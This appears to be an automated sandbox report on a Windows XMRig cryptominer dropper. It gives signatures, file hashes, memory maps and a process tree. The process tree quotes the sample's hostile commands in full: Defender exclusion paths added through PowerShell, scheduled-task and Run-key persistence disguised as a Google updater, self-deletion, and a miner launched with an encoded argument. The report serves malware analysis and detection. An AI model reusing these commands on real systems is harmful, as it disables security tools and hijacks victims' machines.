Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1790s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3532
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:656
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Yvdp8t5knpQz7sFB.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:3348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4004
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3408
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:644
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:4048
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:936
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1828

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.7MB

            MD5

            66cd0ae3c645143a828ed3170093f2ca

            SHA1

            cc5ad47c835493a78a52f5fbc7fc8a8a5f4ad5cb

            SHA256

            d02387859485475df267035dea8abf0785f9b6a9bc3c983b4f0f2e4c6e4c9903

            SHA512

            17d5eea7810f295b0aafce21bcd287fce196e293dea3fd8c19a9a1e7d8bb54f2bb7281980beef6902a0146bcc4177605803291b2f66130e0520167f84a8f50ce

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            19aaeab5863582e82b4cacae001a1f4e

            SHA1

            e9d07182452b556a5b0d5678dfeb8e615daa111d

            SHA256

            2c9e9a47c6c53796d3276f90840eeb55dd3e6206ea9eaedc0c2e1eb4978f34c0

            SHA512

            722625b03f4ecf9e397194680457be9cfbd28848c3461475c67f3c5dc1b68d7910a48e6516b12dc32d0fec5de558fcf8ccd7799318dbd2fee2300e8891232ee9

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgxfpoza.n2q.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/868-37-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/868-51-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/868-38-0x0000014D22BB0000-0x0000014D22BC0000-memory.dmp
            Filesize

            64KB

          • memory/936-160-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-146-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-170-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-168-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-174-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-176-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-178-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-180-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-182-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-166-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-164-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-162-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-122-0x000002336D040000-0x000002336D060000-memory.dmp
            Filesize

            128KB

          • memory/936-158-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-156-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-154-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-152-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-150-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-148-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-172-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-144-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-142-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-140-0x000002336D760000-0x000002336D780000-memory.dmp
            Filesize

            128KB

          • memory/936-139-0x000002336D740000-0x000002336D760000-memory.dmp
            Filesize

            128KB

          • memory/936-138-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-136-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-184-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-135-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-133-0x000002336D760000-0x000002336D780000-memory.dmp
            Filesize

            128KB

          • memory/936-132-0x000002336D740000-0x000002336D760000-memory.dmp
            Filesize

            128KB

          • memory/936-186-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-131-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-129-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-127-0x000002336D720000-0x000002336D740000-memory.dmp
            Filesize

            128KB

          • memory/936-188-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-190-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/936-123-0x00007FF7FAA50000-0x00007FF7FB244000-memory.dmp
            Filesize

            8.0MB

          • memory/1040-54-0x0000028AAAE30000-0x0000028AAAE40000-memory.dmp
            Filesize

            64KB

          • memory/1040-79-0x0000028AC5BD0000-0x0000028AC5BDA000-memory.dmp
            Filesize

            40KB

          • memory/1040-64-0x0000028AAAE30000-0x0000028AAAE40000-memory.dmp
            Filesize

            64KB

          • memory/1040-65-0x00007FF4D82D0000-0x00007FF4D82E0000-memory.dmp
            Filesize

            64KB

          • memory/1040-75-0x0000028AC59A0000-0x0000028AC59BC000-memory.dmp
            Filesize

            112KB

          • memory/1040-76-0x0000028AC59C0000-0x0000028AC5A75000-memory.dmp
            Filesize

            724KB

          • memory/1040-77-0x0000028AC5A80000-0x0000028AC5A8A000-memory.dmp
            Filesize

            40KB

          • memory/1040-78-0x0000028AC5BF0000-0x0000028AC5C0C000-memory.dmp
            Filesize

            112KB

          • memory/1040-53-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/1040-80-0x0000028AC5C30000-0x0000028AC5C4A000-memory.dmp
            Filesize

            104KB

          • memory/1040-81-0x0000028AC5BE0000-0x0000028AC5BE8000-memory.dmp
            Filesize

            32KB

          • memory/1040-82-0x0000028AC5C10000-0x0000028AC5C16000-memory.dmp
            Filesize

            24KB

          • memory/1040-88-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/1040-85-0x0000028AAAE30000-0x0000028AAAE40000-memory.dmp
            Filesize

            64KB

          • memory/1040-83-0x0000028AC5C20000-0x0000028AC5C2A000-memory.dmp
            Filesize

            40KB

          • memory/1256-17-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/1256-14-0x000002C1FA0C0000-0x000002C1FA0D0000-memory.dmp
            Filesize

            64KB

          • memory/1256-12-0x000002C1FA0C0000-0x000002C1FA0D0000-memory.dmp
            Filesize

            64KB

          • memory/1256-13-0x000002C1FA0C0000-0x000002C1FA0D0000-memory.dmp
            Filesize

            64KB

          • memory/1256-11-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/1256-1-0x000002C1F9FE0000-0x000002C1FA002000-memory.dmp
            Filesize

            136KB

          • memory/1828-84-0x00007FF644340000-0x00007FF644551000-memory.dmp
            Filesize

            2.1MB

          • memory/1828-52-0x00007FF644340000-0x00007FF644551000-memory.dmp
            Filesize

            2.1MB

          • memory/1828-121-0x00007FF644340000-0x00007FF644551000-memory.dmp
            Filesize

            2.1MB

          • memory/3408-134-0x00007FF69C960000-0x00007FF69C976000-memory.dmp
            Filesize

            88KB

          • memory/3408-128-0x00007FF69C960000-0x00007FF69C976000-memory.dmp
            Filesize

            88KB

          • memory/3436-32-0x0000021233DB0000-0x0000021233DC0000-memory.dmp
            Filesize

            64KB

          • memory/3436-20-0x0000021233DB0000-0x0000021233DC0000-memory.dmp
            Filesize

            64KB

          • memory/3436-19-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/3436-31-0x0000021233DB0000-0x0000021233DC0000-memory.dmp
            Filesize

            64KB

          • memory/3436-34-0x00007FFEBC530000-0x00007FFEBCFF1000-memory.dmp
            Filesize

            10.8MB

          • memory/4004-91-0x000002A4DF670000-0x000002A4DF680000-memory.dmp
            Filesize

            64KB

          • memory/4004-90-0x00007FFEBC5E0000-0x00007FFEBD0A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4004-92-0x000002A4DF670000-0x000002A4DF680000-memory.dmp
            Filesize

            64KB

          • memory/4004-103-0x000002A4DF670000-0x000002A4DF680000-memory.dmp
            Filesize

            64KB

          • memory/4004-113-0x00007FF40A7A0000-0x00007FF40A7B0000-memory.dmp
            Filesize

            64KB

          • memory/4004-114-0x000002A4F9F20000-0x000002A4F9FD5000-memory.dmp
            Filesize

            724KB

          • memory/4004-115-0x000002A4DF670000-0x000002A4DF680000-memory.dmp
            Filesize

            64KB

          • memory/4004-117-0x00007FFEBC5E0000-0x00007FFEBD0A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4632-36-0x00007FF6D82E0000-0x00007FF6D84F1000-memory.dmp
            Filesize

            2.1MB

          • memory/4632-0-0x00007FF6D82E0000-0x00007FF6D84F1000-memory.dmp
            Filesize

            2.1MB